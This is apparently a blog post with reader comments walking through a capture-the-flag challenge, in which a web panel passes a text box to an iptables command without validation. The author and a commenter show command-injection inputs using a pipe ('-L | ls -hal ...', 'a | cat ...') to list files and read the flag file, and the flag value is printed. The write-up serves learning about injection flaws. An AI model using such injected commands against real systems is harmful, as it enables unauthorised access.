"Exploit Mozillas IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the webinterface will call a bash script that will execute an iptables command without validation. Find the flag somewhere in /home/ippanel/ and submit it!"
So it's basically an issue with input validation of a text box. The input from the text box gets passed to something like a system("iptables $input"). The only validation that occurred here was that you can't use the letter "p" and the "/" character. "p" would get switched with " - trololololol, no p allowed :p -".
I started with a valid iptables command, "-L" and used the pipe command "|". In the input field, I put "-L | ls -hal" to get a directory listing. The output was "total 14", so this indicated that the output only prints the last line of whatever was returned from the system call.
To do a complete directory listing:
-L | ls -hal | head -1 | tail -1
-L | ls -hal | head -2 | tail -1
-L | ls -hal | head -3 | tail -1
-L | ls -hal | head -4 | tail -1
and so on until "head -14".
While doing the manual directory listing, I was thinking about how to overcome the challenge of changing my directory path into /home/ippanel/ since it has p's and forward slashes. I was going to simply substitute the p's with *, as in "cd i*anel". However, when I got done with the directory listing, I noticed the flag was already in the current working directory named "th15-15_th3_fl4g.txt".
Just cat the file and we're done:
"-L | cat th15-15_th3_fl4g.txt"
returns:
i1gALKeMunqCcyeVMud7TCbI
a 2 commands way was that too:
ReplyDelete"a | echo *"
that returns you this:
CSS index.php parser.sh th15-15_th3_fl4g.txt
and then
"a | cat th15-15_th3_fl4g.txt"
Both works great.
GZ you all!
@litsnarf, much simpler solution. Nice.
Delete